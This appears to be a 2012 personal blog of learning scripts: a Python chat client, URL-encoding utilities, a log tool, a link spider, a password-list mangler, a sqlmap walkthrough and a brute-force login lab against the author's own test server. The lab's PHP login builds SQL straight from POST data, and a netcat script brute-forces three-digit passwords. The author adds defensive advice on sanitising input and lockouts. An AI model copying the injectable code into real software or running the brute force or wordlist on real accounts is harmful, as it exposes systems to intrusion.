Sunday, December 23, 2012

Learning Python - Half-Duplex Chat Server/Client

#!/usr/bin/env python

import sys
from socket import *

usage = "Usage: ./clientChat.py <Listening Port>"

if (len(sys.argv) > 1):
    LPORT = int(sys.argv[1])
else:
    sys.exit(usage)

LOCALHOST = ''
BUFSIZE = 1024
ADDR = (LOCALHOST, LPORT)

serverID = ''
portNumb = ''
       
tcpChatSocket = socket(AF_INET, SOCK_STREAM)
tcpChatSocket.bind(ADDR)
tcpChatSocket.listen(5)

chatID = raw_input('Enter you chat ID: ')
chatConversation = raw_input('"W" to wait for a connection, or press "I" to initiate a conversation. ')

while True:

    if chatConversation == "W":
        if serverID == '':
            print "Waiting for the connection..."
        tcpMySocket, ADDR = tcpChatSocket.accept()
        while True:
            data = tcpMySocket.recv(BUFSIZE)
            print data
            if not data:
                break
        chatConversation = "I"
    elif chatConversation == "I":
        if serverID == '':
            serverID = raw_input('Enter friends IP Address: ')
        if portNumb == '':
            portNumb = int(raw_input('Enter listening port for chat: '))
        tcpFriendSocket = socket(AF_INET, SOCK_STREAM)
        remoteADDR = (serverID, portNumb)
        tcpFriendSocket.connect(remoteADDR)
        chatData = raw_input('> ')
        if not chatData:
            break
        tcpFriendSocket.send('[%s] %s' % (chatID, chatData))
        tcpFriendSocket.close()   
        chatConversation = "W"

Friday, December 21, 2012

Encode ASCII to Hex

#!/bin/bash

# Usage: ./script-name <ASCII FILE> | tr -d '\n' > <ENCODED FILE>
# Take a file as the input

testInput=$1

function encode {

    case ${1} in
        "") echo "%20" ;; "!") echo "%21" ;; "\"") echo "%22" ;;
        "#") echo "%23"    ;; "$") echo "%24" ;; "&") echo "%26" ;;
        "%") echo "%25"    ;; "'") echo "%27" ;; "(") echo "%28" ;;
        ")") echo "%29" ;; '*') echo '%2a' ;; '+') echo '%2b' ;;
        ',') echo '%2c' ;; '-') echo '%2d' ;; '.') echo '%2e' ;;
        "/") echo '%2f' ;; '0') echo '%30' ;; '1') echo '%31' ;;
        '2') echo '%32' ;; '3') echo '%33' ;; '4') echo '%34' ;;
        '5') echo '%35' ;; '6') echo '%36' ;; '7') echo '%37' ;;
        '8') echo '%38' ;; '9') echo '%39' ;; ':') echo '%3a' ;;
        ';') echo '%3b' ;; '<') echo '%3c' ;; '=') echo '%3d' ;;
        '>') echo '%3e' ;; '?') echo '%3f' ;; '@') echo '%40' ;;
        'A') echo '%41' ;; 'B') echo '%42' ;; 'C') echo '%43' ;;
        'D') echo '%44' ;; 'E') echo '%45' ;; 'F') echo '%46' ;;
        'G') echo '%47' ;; 'H') echo '%48' ;; 'I') echo '%49' ;;
        'J') echo '%4a' ;; 'K') echo '%4b' ;; 'L') echo '%4c' ;;
        'M') echo '%4d' ;; 'N') echo '%4e' ;; 'O') echo '%4f' ;;
        'P') echo '%50' ;; 'Q') echo '%51' ;; 'R') echo '%52' ;;
        'S') echo '%53' ;; 'T') echo '%54' ;; 'U') echo '%55' ;;
        'V') echo '%56' ;; 'W') echo '%57' ;; 'X') echo '%58' ;;
        'Y') echo '%59' ;; 'Z') echo '%5a' ;; '[') echo '%5b' ;;
        '\\') echo '%5c' ;; ']') echo '%5d' ;; '^') echo '%5e' ;;
        '_') echo '%5f' ;; '`') echo '%60' ;; 'a') echo '%61' ;;
        'b') echo '%62' ;; 'c') echo '%63' ;; 'd') echo '%64' ;;
        'e') echo '%65' ;; 'f') echo '%66' ;; 'g') echo '%67' ;;
        'h') echo '%68' ;; 'i') echo '%69' ;; 'j') echo '%6a' ;;
        'k') echo '%6b' ;; 'l') echo '%6c' ;; 'm') echo '%6d' ;;
        'n') echo '%6e' ;; 'o') echo '%6f' ;; 'p') echo '%70' ;;
        'q') echo '%71' ;; 'r') echo '%72' ;; 's') echo '%73' ;;
        't') echo '%74' ;; 'u') echo '%75' ;; 'v') echo '%76' ;;
        'w') echo '%77' ;; 'x') echo '%78' ;; 'y') echo '%79' ;;
        'z') echo '%7a' ;; '{') echo '%7b' ;; '|') echo '%7c' ;;
        '}') echo '%7d' ;; '~') echo '%7e' ;;
        *) echo $1 ;;
    esac

}

while read line
do


    for (( c=0; c<${#line}; c++ ))
    do
        encode ${line:$c:1}
    done

    echo "%0a"


done < $testInput


echo "\n"

Tuesday, December 11, 2012

Decode Hex to ASCII

#!/bin/bash

# Written: December 2012

# This program is built to decode hex to ASCII text
# The program takes what it is given at the command line and then decodes it...

testInput=$1

# echo $testInput -- If you echo it will read the string from the command line
# cat $testInput -- Takes the filename and decodes it
cat $testInput | sed 's/%20/ /g' | \
        sed 's/%21/!/g' | sed 's/%22/"/g' | sed 's/%23/#/g' | sed 's/%24/$/g' | \
        sed 's/%25/%/g' | sed 's/%26/&/g' | sed "s/%27/'/g" | sed 's/%28/(/g' | \
        sed 's/%29/)/g' | sed 's/%2a/*/g' | sed 's/%2b/+/g' | sed 's/%2c/,/g' | \
        sed 's/%2d/-/g' | sed 's/%2e/./g' | sed 's/%2f/\//g' | sed 's/%30/0/g' | \
        sed 's/%31/1/g' | sed 's/%32/2/g' | sed 's/%33/3/g' | sed 's/%34/4/g' | \
        sed 's/%35/5/g' | sed 's/%36/6/g' | sed 's/%37/7/g' | sed 's/%38/8/g' | \
        sed 's/%39/9/g' | sed 's/%3a/:/g' | sed 's/%3b/;/g' | sed 's/%3c/</g' | \
        sed 's/%3d/=/g' | sed 's/%3e/>/g' | sed 's/%3f/?/g' | sed 's/%40/@/g' | \
        sed 's/%41/A/g' | sed 's/%42/B/g' | sed 's/%43/C/g' | sed 's/%44/D/g' | \
        sed 's/%45/E/g' | sed 's/%46/F/g' | sed 's/%47/G/g' | sed 's/%48/H/g' | \
        sed 's/%49/I/g' | sed 's/%4a/J/g' | sed 's/%4b/K/g' | sed 's/%4c/L/g' | \
        sed 's/%4d/M/g' | sed 's/%4e/N/g' | sed 's/%4f/O/g' | sed 's/%50/P/g' | \
        sed 's/%51/Q/g' | sed 's/%52/R/g' | sed 's/%53/S/g' | sed 's/%54/T/g' | \
        sed 's/%55/U/g' | sed 's/%56/V/g' | sed 's/%57/W/g' | sed 's/%58/X/g' | \
        sed 's/%59/Y/g' | sed 's/%5a/Z/g' | sed 's/%5b/[/g' | sed 's/%5c/\\/g' | \
        sed 's/%5d/]/g' | sed 's/%5e/^/g' | sed 's/%5f/_/g' | sed 's/%60/`/g' | \
        sed 's/%61/a/g' | sed 's/%62/b/g' | sed 's/%63/c/g' | sed 's/%64/d/g' | \
        sed 's/%65/e/g' | sed 's/%66/f/g' | sed 's/%67/g/g' | sed 's/%68/h/g' | \
        sed 's/%69/i/g' | sed 's/%6a/j/g' | sed 's/%6b/k/g' | sed 's/%6c/l/g' | \
        sed 's/%6d/m/g' | sed 's/%6e/n/g' | sed 's/%6f/o/g' | sed 's/%70/p/g' | \
        sed 's/%71/q/g' | sed 's/%72/r/g' | sed 's/%73/s/g' | sed 's/%74/t/g' | \
        sed 's/%75/u/g' | sed 's/%76/v/g' | sed 's/%77/w/g' | sed 's/%78/x/g' | \
        sed 's/%79/y/g' | sed 's/%7a/z/g' | sed 's/%7b/{/g' | sed 's/%7c/|/g' | \
        sed 's/%7d/}/g' | sed 's/%7e/~/g' | sed 's/%0a/\n/g'

Change syslog timestamp to Human Readable Date and Time

#!/bin/bash

#

# This script is designed to take the first column of the syslog and convert it to a time stamp...
# This is given if the 3 0's are removed from the end of the time stamp if they exist

while read syslogLine
do

        timeRecreate=`echo $syslogLine | awk '{print "@"$1}'`
        dateRecreate=`date -d $timeRecreate`
        echo $dateRecreate" "$syslogLine

done < syslogFile.txt

Compare 2 Lists of IP Addresses

#!/bin/bash
# Written by: Leon Trappett
#
# This script will take 2 lists of IP addresses from text files and then list the IP addresses that are common amongst them
# For example from a firewall log and a list of known compromised hosts

countLoopA=0
countLoopB=0

while read unusualIP
do

        while read firewallIP
        do

                if [[ $unusualIP == $firewallIP ]]; then
                        echo "***" $firewallIP
                        break
                fi

                let countLoopA=countLoopA+1

        done < filename1.txt


        let countLoopB=countLoopB+1

#       echo $countLoopB " " $countLoopA


done < filename2.txt

Word Mangling a Word List to become a Password List

#!/bin/bash

# Written: December 2012
#
# This program was written to take as input a file that contains a wordlist and then transform it to make a password list.
# The password list is designed to be that of an 8 character password
# This is not meant to be used maliciously

function mangleWord {

    echo $1 | sed 's/a/@/' | sed 's/e/3/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/a/@/' | sed 's/e/3/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/a/@/' | sed 's/e/3/' | sed 's/i/1/'
    echo $1 | sed 's/a/@/' | sed 's/e/3/' | sed 's/i/!/'
    echo $1 | sed 's/a/@/' | sed 's/e/3/'
    echo $1 | sed 's/a/@/'
    echo $1 | sed 's/e/3/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/e/3/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/e/3/' | sed 's/i/1/'
    echo $1 | sed 's/e/3/' | sed 's/i/!/'
    echo $1 | sed 's/e/3/'
    echo $1 | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/i/1/'
    echo $1 | sed 's/i/!/'
    echo $1 | sed 's/o/0/'
    echo $1 | sed 's/a/@/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/a/@/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/a/@/' | sed 's/i/1/'
    echo $1 | sed 's/a/@/' | sed 's/i/!/'
    echo $1 | sed 's/a/@/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/' | sed 's/e/3/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/' | sed 's/e/3/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/e/3/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/e/3/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/'
    echo $1 | sed 's/s/$/' | sed 's/e/3/'
    echo $1 | sed 's/s/$/' | sed 's/i/1/'
    echo $1 | sed 's/s/$/' | sed 's/1/!/'
    echo $1 | sed 's/s/$/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/' | sed 's/i/1/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/' | sed 's/i/!/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/a/@/' | sed 's/e/3/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/e/3/' | sed 's/o/0/'
    echo $1 | sed 's/s/$/' | sed 's/e/3/' | sed 's/i/1/'
    echo $1 | sed 's/s/$/' | sed 's/e/3/' | sed 's/i/!/'

}





while read line
do

    strLength=`expr length $line`
#    echo $line length=`expr length $line`

    # Conditions to manipulate the string if it is less than 5 characters long
#    if [[ $strLength -lt 5 ]] ; then
#        echo "Too Short"
#    fi

    case $strLength in

        # Conditions to manipulate the string if it is 4 characters in length
        4)

            # echo $line length=`expr length $line`
            lineToLower=`echo $line | awk '{print tolower($0)}'`
            firstLetter=`echo ${lineToLower:0:1} | tr '[a-z]' '[A-Z]'`
            fourLetterWord=`echo $firstLetter${lineToLower:1:3}`

            for i in 2007 2008 2009 2010 2011 2012 2013 2014 2015 2016
            do
                echo ${fourLetterWord}$i
                mangleWord ${fourLetterWord}$i
#                mangleWord2 ${fourLetterWord}$i
            done
            ;;

        # Conditions to manipulate the string if it is 5 characters in length
        5)

            # echo $line length=`expr length $line`
            lineToLower=`echo $line | awk '{print tolower($0)}'`
            firstLetter=`echo ${lineToLower:0:1} | tr '[a-z]' '[A-Z]'`
            fiveLetterWord=`echo $firstLetter${lineToLower:1:4}`

            for i in 123 234 345 456 567 678 789 890
            do
                echo ${fiveLetterWord}$i
                mangleWord ${fiveLetterWord}$i
#                mangleWord2 ${fiveLetterWord}$i
            done
            ;;
       
        # Conditions to manipulate the string if it is 6 characters in length
        6)

            lineToLower=`echo $line | awk '{print tolower($0)}'`
            firstLetter=`echo ${lineToLower:0:1} | tr '[a-z]' '[A-Z]'`
            sixLetterWord=`echo $firstLetter${lineToLower:1:5}`

            for i in 12 23 34 45 56 67 78 89 90 01 02 03 04 05 06 07 08 09 10 11 00 22 33 44 55 66 77 88 99 13 14
            do
                echo ${sixLetterWord}$i
                mangleWord ${sixLetterWord}$i
#                mangleWord2 ${sixLetterWord}$i
            done
            ;;   
        7)

            # echo $line length=`expr length $line`
            lineToLower=`echo $line | awk '{print tolower($0)}'`
            firstLetter=`echo ${lineToLower:0:1} | tr '[a-z]' '[A-Z]'`
            sevenLetterWord=`echo $firstLetter${lineToLower:1:6}`

            for i in 0 1 2 3 4 5 6 7 8 9 "?" "!" "#" "$"
            do
                echo ${sevenLetterWord}$i
                mangleWord ${sevenLetterWord}$i
#                mangleWord2 ${sevenLetterWord}$i
            done
            ;;
        8)

            # echo $line length=`expr length $line`
            lineToLower=`echo $line | awk '{print tolower($0)}'`
            firstLetter=`echo ${lineToLower:0:1} | tr '[a-z]' '[A-Z]'`
            eightLetterWord=`echo $firstLetter${lineToLower:1:7}`

            echo ${eightLetterWord}
            mangleWord ${eightLetterWord}

            for i in 0 1 2 3 4 5 6 7 8 9 "?" "!" "#" "$"
            do
                echo ${eightLetterWord}$i
                mangleWord ${eightLetterWord}$i
#                mangleWord2 ${sevenLetterWord}$i
            done
            ;;


    esac
   
done < $1

Sunday, September 9, 2012

sqlmap - A Tool to Test SQL Injection

In a previous post I designed a simple web page that would accept a username and password.  I chose to test this same page for sql injections with a tool called sqlmap.

First taking the server response from a previous post I noticed the data was posted as "username=test&password=test".  Then I took this information and created the sqlmap command I was going to run.

python sqlmap.py --data="username=test&password=test" --url="http://test.local" -t http.log

It was after some research that I found the "-t" option.  This outputs to a file the server and client responses in plain text or the encoding used. 

The http.log was a lot easier to use then wireshark that I initially was using.  I wanted to understand more of how sqlmap could gather the database name, table name and then the contents of this.

I grepped the http.log file for the keyword username= and found after url-decoding the SQL statements being sent back and forth.  Then I analyzed the Set-cookie for the data that was being leaked.  

Observations to note:
1. Verify when you create  variable that passes data that the size of the variable is checked.  If the size of the username or password was truncated it would have not allowed sqlmap to gather the data that it needed.

2. Sanitize the data as it is passed to a POST or GET type variable

3. Hackers will hide from the http logs what they are trying to accomplish because the data is not being recorded in the URL

4. If the username and password were incorrect the sqlmap tool would not work properly.

5. Be careful disclosing the errors that may occur in a sql query or web page errors.  This could give hackers a clue as to how your application is designed.

Monday, September 3, 2012

Simple Bash HTTP Spider

I was tasked with finding broken links and links that did not link directly with a parent site.  Here is the simple Bash HTTP Spider that I wrote.  The followMaster.txt has the list of URLs referring to the parent site.  The links_outside.txt and links_outsideNew.txt have the external links or ones without the URL as the argument in them.

Usage: ./spider.sh http://url.url

#!/bin/bash
# This script is design to spider a web site for URLs
# The first argument is the URL that will be spidered...
# This core URL will remain as the spider goes through the site
# Will spider 5 rounds through the URLs found

if [ $# -eq 0 ]; then
    echo "Example: ./spider.sh url"
    echo "URL - URL to spider"
    echo ""
    exit
fi

wget $1 -O main.txt

cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$1" | sort | uniq
> follow.txt
cat main.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v "$1" | sort | un
iq > links_outside.txt

cp follow.txt followMaster.txt

rm -f followNew.txt
rm -f links_outsideNew.txt
touch followNew.txt
touch links_outsideNew.txt

for i in {1..5}
do

    while read line
    do
        wget $line -O child.txt
   
        cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep "$
1" | sort | uniq >> followNew.txt
        cat child.txt | grep "a href" | sed 's/.*<a href="//' | sed 's/">.*//' | awk '{print $1}' | grep -v -e "javascript:" | sed 's/"//' | grep -v
 "$1" | sort | uniq >> links_outsideNew.txt

    done < "follow.txt"

    # Sort and find the uniq links from the loops above for links related to the the company
    cat followNew.txt | sort | uniq > followNew.temp
    cat followNew.temp > followNew.txt

    # Sort and find the uniq links from the loops above for the links not related to the company
    cat links_outsideNew.txt | sort | uniq > links_outsideNew.temp
    cat links_outsideNew.temp > links_outsideNew.txt

    # Compare the links in follow and followNew and add to the followMaster file
    comm follow.txt followNew.txt -1 -3 > followMaster.temp

    # Append to the followMaster main file
    cat followMaster.temp >> followMaster.txt

    # Recreate a followMaster file of the URLs found and scanned
    cat followMaster.txt | sort | uniq > followMaster.temp
    cat followMaster.temp > followMaster.txt

    # Recreate the follow.txt file for another round if specified in the for loop
    comm followMaster.txt followNew.txt -1 -3 > follow.txt

done

Brute Force HTTP Login

The purpose of this post is to better understand how to brute force an HTTP login.  So I took the time to design a real simple web application in php with a MySQL database.  This is so I could have a test server to work from.

The php code is below that I used:
<HTML>
<BODY>
<FORM NAME="index" method="POST" action="checklogin.php">
<?php
        echo '<TABLE><TR>';
        echo '<TD>Username</TD><TD><input type=text name=username size=20></TD>';
        echo '</TR><TR>';
        echo '<TD>Password</TD><TD><input type=password name=password size=20></TD>';
        echo '</TR><TR>';
        echo '<TD COLSPAN=2><CENTER><input type=submit value=Login></CENTER></TD>';
        echo '</TR></TABLE>';
?>
</FORM>
</BODY>
</HTML>

The php code for checklogin.php is also below:
<HTML>
<BODY>
<?php
$host="localhost";
$username="dbuser";
$password="123";
$db_name="login";
$tbl_name="usersTable";
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");
$usernamePOST=$_POST['username'];
$passwordPOST=$_POST['password'];
$loginSuccess = 'No';
$sql="SELECT * FROM $tbl_name WHERE username='$usernamePOST' and password='$passwordPOST'";
$result=mysql_query($sql);
while ($row = mysql_fetch_array($result)) {
        $userApp = $row['username'];
        $passApp = $row['password'];
        if (($userApp == $usernamePOST) && ($passApp == $passwordPOST)) {
                $loginSuccess = 'Yes';
        }
}
if ($loginSuccess == 'Yes') {
        echo "Login was Successful!";
}
else {
        echo "Login was unsuccessful!";
}
?>
</BODY>
</HTML>

 

Then I used wireshark to capture the packet that went between the web browser and the web application.  This packet tells me the language that I can use to interact using nc (netcat) with the web page that I built.  The ASCII text of the packet that I need is below:

POST /checklogin.php HTTP/1.1
Host: test.local
User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0
.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9, */*;q=o.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://test.local/
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=test&password=test


After gathering the packet now I needed a script that would brute force the username and/or password.  For simplicity I chose the username test and then a 3 digit password to design the script around.  I had to pay attention to the content length variable because it would change based on the length of the username or password.

In designing the script I had to also place a delay in the script due to it quickly reaching the maximum number of connections on a web server.  Then I also had to when nc (netcat) was called the connection would stay open for 5 seconds so I placed a delay in the script of 2-5 seconds.  Also to avoid hitting the DNS server multiple times I placed the IP address into the nc (netcat) command.  The biggest change I had to make was to remove the Accept-Encoding: gzip line or else the response sent back would be gzipped.  With removing this I was able to get back the clear text response from the server.

The bash script I wrote is below:
#!/bin/bash

# 1st character
for i in {0..9}
do

# 2nd character
for j in {0..9}
do

# 3rd character
for k in {0..9}
do

    password=$i$j$k
    length=`expr length $password`

# 4. Populate HTTP POST

    echo "POST /checklogin.php HTTP/1.1" > temp/post-reply$i$j$k.txt
    echo "Host: server.local" >> temp/post-reply$i$j$k.txt
    echo "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.2) Gecko/20100101 Firefox/10.0.2" >> temp/post-reply$i$j$k.txt
    echo "Accept: text/html,application/xhtml+xml,application/xml;q=0.9, */*;q=o.8" >> temp/post-reply$i$j$k.txt
    echo "Accept-Language: en-us,en;q=0.5" >> temp/post-reply$i$j$k.txt
    echo "Connection: keep-alive" >> temp/post-reply$i$j$k.txt
    echo "Referer: http://server.local/" >> temp/post-reply$i$j$k.txt
    echo "Content-Type: application/x-www-form-urlencoded" >> temp/post-reply$i$j$k.txt
    if [ $length = 1 ]; then   
        echo "Content-Length: 24" >> temp/post-reply$i$j$k.txt
    fi
    if [ $length = 2 ]; then
        echo "Content-Length: 25" >> temp/post-reply$i$j$k.txt
    fi
    if [ $length = 3 ]; then
        echo "Content-Length: 26" >> temp/post-reply$i$j$k.txt
    fi

    echo "" >> temp/post-reply$i$j$k.txt   
    echo "username=test&password=$password" >> temp/post-reply$i$j$k.txt
    echo "" >> temp/post-reply$i$j$k.txt   
    echo "" >> temp/post-reply$i$j$k.txt   
   

    nc 10.172.172.2 80 < temp/post-reply$i$j$k.txt > response/response$i$j$k.txt &
    sleep 3
           
done
done
done


This was a success in being able to find the username of test and password of '123' due to the web page returning different results when it was successful.

To control the brute-force attack you could place a temporary time delayed lock out on the account after so many successive tries.  This was a first of many exercises I will be posting...  Enjoy!

Powershell - Gather Mapped Drives from a List of Computer Names

I created the following Powershell script to gather remotely the mapped drives that users had in their profiles.  I had to create the script...